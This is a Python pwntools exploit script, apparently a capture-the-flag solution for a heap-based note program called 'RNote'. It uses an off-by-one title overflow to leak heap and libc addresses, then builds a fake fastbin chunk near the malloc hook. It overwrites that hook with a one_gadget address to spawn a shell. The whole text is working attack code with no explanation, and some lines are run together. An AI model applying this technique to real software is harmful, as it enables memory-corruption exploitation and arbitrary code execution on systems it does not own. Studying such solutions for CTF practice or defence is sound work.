e = ELF('./RNote')
s = process(e.path, env={'LD_PRELOAD':'./libc.so.6'})l = ELF('./libc.so.6')
ru = lambda x: s.recvuntil(x)
sl = lambda x: s.sendline(x)
p = lambda : pause()
io = lambda : s.interactive()
def menu(sel):
ru(': ') sl(sel)
def add(size, title, content, toggle=0):
menu('1')
ru(': ') sl(size)
ru(': ') if toggle:
s.send(title)
else:
sl(title)
ru(': ') sl(content)
def delete(idx):
menu('2')
ru(': ') sl(idx)
def show(idx):
menu('3')
ru(': ') sl(idx)
def exit():
menu('4')
add(str(0x10), 'A'*17, 'content', toggle=1)
show('0')
ru('A'*17)heap_0 = u32('\x00' + s.recv(3))print('heap_0!: {}'.format(hex(heap_0)))
add(str(0x10), 'A'*16 + '\x50', 'content2')
add(str(0x80), 'title3', 'content3')
add(str(0x60), 'title4', 'content4')
delete('2')
show('1')
ru('content: ')libc_base = u64(s.recv(6).ljust(8, '\x00')) - 0x3c3b78
print('libc_base!: {}'.format(hex(libc_base)))
add(str(0x60), 'title5', 'content5')
add(str(0x60), 'title6', 'content6')
add(str(0x10), 'A'*16+'\xe0', 'content7', toggle=1)
delete('3')delete('4')delete('5')
fake_chunk = libc_base + 0x3c3afd - 8 - 8
print('fake_chunk!:{}'.format(hex(fake_chunk)))
add(str(0x60), 'title7', p64(fake_chunk))
add(str(0x60), 'title8', 'content8')
add(str(0x60), 'title9', 'content9')
one_gadget = [0x4526a, 0xef6c4, 0xf0567]
one = libc_base + one_gadget[2]
add(str(0x60), 'title10', 'A'*19 + p64(one))
sl('1')sl('1')
